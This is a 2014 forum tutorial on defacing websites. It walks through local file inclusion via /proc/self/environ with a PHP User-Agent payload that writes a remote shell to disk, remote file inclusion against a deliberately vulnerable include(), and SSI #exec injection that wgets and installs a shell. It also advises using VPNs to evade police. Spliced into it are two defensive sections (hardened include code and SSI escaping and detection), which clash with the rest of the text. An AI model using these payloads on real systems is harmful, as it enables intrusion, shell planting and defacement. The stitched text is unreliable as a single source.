www.i4info.org

Tutorial Advanced Exploitation Techniques

Admin

Posts : 455
Reputation : 5
Join date : 2014-12-10
Age : 24
Location : Pakistan


Post by Admin on Thu Dec 25, 2014 3:46 pm

Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word


Chapter I: Recon

Alright, imagine this: you are a Navy SEAL, ready to strike Osama bin Laden's house. But... you haven't prepared any strategy or plan, and you haven't found any flaw in the house or its security. I bet you could tell me what's going to happen with the mission: COMPLETE FAILURE.
Always plan, plan and don't forget... plan. Let me briefly explain what I mean by planning. The art of planning is basically gathering information about your target. The information I always collect is: the OS, the CMS it is running, and whether any ports are open. After I have gathered that information I usually perform a Paros Proxy scan on the site. Basically all it does is scan the site for vulnerabilities and produce a fancy report.
If you want to download and use Paros yourself, be my guest.
Alright now... I assume that you have the following information:
an idea which ports are open on the target, the operating system, the CMS the server might be running (not necessary) and your Paros Proxy report. That's basically all the information you need to determine which kind of attack you are going to use against the target.

Chapter II: Tools

Like every job there is, you will need tools.
We hackers need only a very small number of tools to complete our main goal, which is exploiting that one website you wish to deface.
Alright, throughout this tutorial we are not going to use fancy tools.
Instead we will be using these key tools: your brain, your hands and, last but certainly not least... Firefox.
Make sure that you have either HTTP Headers or Tamper Data installed as a Firefox add-on.


Chapter III: Safety

In a world where people hack targets you have another group of people. I bet you feel this coming... the police.
Trust me on this one: once you start hacking big sites, the police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basically it's a server you connect to, which intercepts all your packets and routes them through its server. All that it does is hide your real IP.
Some free VPNs are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, I would highly recommend getting a paid VPN like vpntunnel or anonine.


Chapter IV: Local File Inclusion

Most of you have probably heard about this method once or twice. This is the so-called "LFI" exploitation method.
LFI can occur on sites with this extension:

Code:

[You must be registered and logged in to see this link.]


When you perform an LFI attack you attempt to traverse out of the server's directories to end up at proc/self/environ. This can be done with ../../../proc/self/environ or if the ../. Useless, you say? WELL, I couldn't disagree more with you on that one. You see, at first sight proc/self/environ seems like a bunch of shit.
It will look something like this:

Code:

TMPDIR=/var/chroot/home/content/23/8340423/tmp
PHPRC=/var/chroot/home/content/23/8340423/html
TEMP=/var/chroot/home/content/23/8340423/tmp
PHP_FCGI_CHILDREN=0
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/web/cgi-bin
SHLVL=0
RAILS_ENV=production
SPI=TRUE
TMP=/var/chroot/home/content/23/8340423/tmp
PHP_FCGI_MAX_REQUESTS=100000


But there is something really cool we can do with this.
We can spawn a shell through this directory...
Now I've got your attention, right? Good. To spawn a shell we simply open up Tamper Data and reload the page while we are tampering.
Once you see a little message pop up, click Tamper Data.
Now we will notice a little User-Agent tab.
In there we will type the following code:

PHP Code:


<?php
// Open (or create) the destination file for writing.
$file = fopen("shellname.php", "w+");
// Open the source text file for reading.
$stream = fopen("Link you shell here/shell.txt", "r");
$shell = ''; // initialise so .= does not raise an undefined-variable notice
while (!feof($stream)) {
    $shell .= fgets($stream);
}
fwrite($file, $shell);
fclose($file);
?>



Thanks to Legit for that code. Works better than mine with system();
Now once you have done that, click the submit button and your shell should be spawned :). To check if it worked go to This link is hidden from you. If you want to see it you have to [You must be registered and logged in to see this link.] on this board. And voila.


Chapter V: Remote File Inclusion

I'm not very glad to say it, but this is one of the good exploit methods that has died. There are almost no websites that have this vulnerability. That's because it's so easy to fix and yet so harmful.
I will explain the so-called "RFI" briefly.
RFI, or remote file inclusion, is a technique where you exploit the include(); function.
RFI and LFI are quite similar; there's a catch though. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For example: a site includes PHP scripts in an unprotected manner.
A little bit like this:

PHP Code:


<?php
// Vulnerable on purpose: the COLOR parameter goes straight into include().
$color = 'blue';
if (isset($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}
include($color . '.php');
?>



Now to exploit this we will execute the following command:

Code:

[You must be registered and logged in to see this link.]


Now you are wondering... why the hell did he use a .txt shell?
PHP automatically treats the .txt as .php, which will result in a nice shell to own/deface the website.
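For the defensive side of both the LFI chapter and this RFI chapter, here is a hardened replacement for the include($_GET['COLOR'] . '.php') snippet above. This is an added example, not code from the original post or from any project it mentions; ALLOWED_THEMES, THEME_DIR and the function names are assumptions made for illustration. The same two checks (an exact-match allowlist, then a realpath containment check) stop both the ../../../proc/self/environ traversal and a URL pointing at a remote .txt file.

```php
<?php
// Added example, not code from the original post: a hardened replacement for
// the include($_GET['COLOR'] . '.php') pattern shown above. ALLOWED_THEMES,
// THEME_DIR and the function names are assumptions made for illustration.

// Every theme file that may ever be included, by exact name. An allowlist
// stops both LFI (../../../proc/self/environ) and RFI (a URL to a .txt
// file): any value not in the list never reaches include().
const ALLOWED_THEMES = ['blue', 'red', 'green'];
const THEME_DIR = __DIR__ . '/themes';

function resolve_theme($requested): ?string
{
    // Reject non-string input such as ?COLOR[]=x before it reaches in_array().
    if (!is_string($requested) || !in_array($requested, ALLOWED_THEMES, true)) {
        return null;
    }
    // Defence in depth: even an allowlisted name must resolve to an existing
    // file inside THEME_DIR. realpath() collapses ../ and symlinks, so the
    // containment check below cannot be fooled by traversal sequences.
    $base = realpath(THEME_DIR);
    $path = realpath(THEME_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function load_theme(): void
{
    $requested = $_GET['COLOR'] ?? 'blue';
    $path = resolve_theme($requested);
    if ($path === null) {
        // Record the rejected value hex-encoded (so log viewers are not handed
        // raw markup) and stop; never fall back to include().
        $logged = is_string($requested) ? bin2hex($requested) : 'non-string';
        error_log('theme include rejected: ' . $logged);
        http_response_code(400);
        exit('invalid theme');
    }
    include $path;
}

load_theme();
```

Independently of the application code, `allow_url_include = Off` in php.ini (the default since PHP 5.2) makes include() refuse URLs outright, which removes RFI for the whole server, and `open_basedir` confines file access to named directories, which blunts LFI even if a developer forgets the allowlist. The rejected-value log line is what a SOC would alert on: a sudden run of 400s with hex-encoded `2e2e2f` (../) or `687474703a` (http:) is a scan in progress.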

Chapter VI: Server Side Inclusion

Okay, now we move on to the "harder" methods.
Server Side Inclusion, or SSI, is an advanced technique that exploits vulnerabilities in the HTML code.
All this means is that you inject script into HTML forms, which results in spawning a shell or doing something worse.
SSI can only be performed on a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is something else to keep in mind: SSI will also work in normal pages, but ONLY when the input is not filtered.
For example, we have a little textbox which is vulnerable to SSI.
We can run some nice little commands here, for example:

Code:

<!--#exec cmd="cd \admin\dir" -->
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->


I will explain these 2 commands to you for a moment.
The first command lets you browse directories that you can't access without administrator privileges. The second command lets you download your shell onto the website (this is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:

Code:

<!--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basically finds your shell.txt, converts it to PHP and places it in the directory of your choice.
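The chapter says SSI only works when the input is not filtered, so here is what that filtering looks like from the application side, together with a detector that logs attempts. This is an added example and not code from the original post; the function names and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not code from the original post: handling untrusted text
// that an application writes into a server-parsed (.shtml) page. The
// function names and the sample inputs below are constructed for illustration.

// mod_include only acts on the sequence <!--#directive ... -->.
// htmlspecialchars() rewrites '<' as '&lt;', so the output can no longer be
// parsed as an SSI directive (nor as an HTML tag). Apply it to every value
// that is echoed into a page served with server-side includes enabled.
function ssi_safe(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Detection side: flag submissions that carry an SSI directive so the
// attempt is logged even though the escaping above already neutralises it.
// The pattern tolerates whitespace between '<!--' and '#' (which Apache does
// not accept) so mangled variants are still noticed.
function looks_like_ssi(string $input): bool
{
    return preg_match(
        '/<!--\s*#\s*(exec|include|echo|config|set|printenv|fsize|flastmod)\b/i',
        $input
    ) === 1;
}

// Constructed sample inputs: the first and last directives quoted in the
// post above, an ordinary HTML comment and plain text with angle brackets.
$samples = [
    '<!--#exec cmd="cd \\admin\\dir" -->',
    '<!--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->',
    'great site <!-- just a comment -->',
    'price < 5 and > 3',
];

foreach ($samples as $s) {
    // ALERT lines are what you would forward to the SIEM; the escaped text
    // is what actually gets written into the page.
    printf("%-6s %s\n", looks_like_ssi($s) ? 'ALERT' : 'ok', ssi_safe($s));
}
```

On Apache the surest fix is in the server config rather than the application: `Options IncludesNOEXEC` keeps the include/echo directives but disables `#exec`, and `Options -Includes` turns SSI off for the directory entirely, so a .shtml page that does not need includes should have neither. Escaping only protects text placed in ordinary HTML context; a value dropped inside an existing directive's attribute needs stricter validation than this.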


Chapter VII: Last things

Well, this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and I hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. It's highly appreciated :)


